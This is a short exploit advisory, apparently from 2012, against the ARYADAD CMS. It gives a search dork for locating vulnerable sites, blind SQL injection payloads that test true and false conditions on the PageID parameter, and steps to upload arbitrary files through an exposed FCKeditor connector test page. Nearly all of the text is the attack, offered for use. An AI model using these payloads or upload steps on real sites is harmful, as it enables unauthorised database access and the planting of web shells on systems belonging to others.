#
# Title : ARYADAD Multi Vulnerability
# Author : Red Security TEAM
# Date : 21/01/2012
# Vendor : http://cms.aryadad.com/
# Tested On : Windows Server 2008 (IIS 7.5)
# Dork : Powered by ARYADAD Corporation
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
#
# I : Blind SQL Injection Vulnerability
# True : http://server/Default.aspx?PageID=117' and 1-1 = '0
# False : http://server/Default.aspx?PageID=117' and 2-1 = '0
#
# II : File Upload Vulnerability
# 1. Go to : /FA/fckeditor/editor/filemanager/connectors/test.html
# 2. Set Connector To ASP.Net and upload your file , You can see your uploaded files in FA/userfiles/file/
#